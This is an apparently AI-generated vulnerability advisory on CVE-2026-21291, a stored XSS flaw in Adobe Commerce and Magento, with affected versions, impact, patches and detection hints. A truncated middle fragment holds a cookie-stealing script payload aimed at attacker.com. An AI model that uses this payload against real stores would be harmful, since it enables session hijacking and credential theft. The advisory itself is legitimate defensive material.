
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21291 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a high-privileged attacker to inject malicious scripts into vulnerable form fields. Affected versions include Adobe Commerce 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier, as well as corresponding Adobe Commerce B2B releases. Exploitation requires user interaction — a victim must browse to the page containing the compromised field. The vulnerability was disclosed on March 10–11, 2026, with a CVSS v3.1 base score of 4.8 (Medium) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored (persistent) variant. A high-privileged attacker (e.g., an administrator) can inject malicious JavaScript into form fields within the Adobe Commerce admin panel; the payload is persisted server-side and later rendered unsanitized in the browser of any user who visits the affected page. The attack vector is network-based, requires no special complexity, but does require high privileges and user interaction from a victim to trigger script execution (Adobe Advisory).
When exploited, the injected script executes in the browser context of any user — including other administrators — who views the page containing the malicious field, potentially enabling session hijacking, credential theft, or unauthorized administrative actions. Because the payload persists in the application, it can affect multiple victims over time without repeated attacker interaction. Confidentiality and integrity are both impacted at a low level (limited data exposure and limited content manipulation), while availability is not directly affected (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field and save the form.<script>, javascript:, or encoded variants such as %3Cscript%3E.cms_block, catalog_product_entity_text, or similar tables may contain injected script tags.Adobe has released patched versions addressing this vulnerability as documented in security bulletin APSB26-05. Organizations should upgrade to the following fixed releases or later: Adobe Commerce 2.4.4-p17, 2.4.5-p16, 2.4.6-p14, 2.4.7-p9, 2.4.8-p4, or 2.4.9 (GA), and corresponding Magento Open Source and Commerce B2B versions. As an interim measure, restrict administrative form field access to the minimum number of trusted administrators and monitor admin activity logs for suspicious changes to content fields (Adobe Advisory).
The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in the March 2026 update cycle, including this stored XSS. Coverage was also noted on threat intelligence aggregators such as BeyondMachines and VulDB shortly after disclosure. No significant researcher commentary or social media discussion beyond routine CVE tracking has been identified for this specific vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."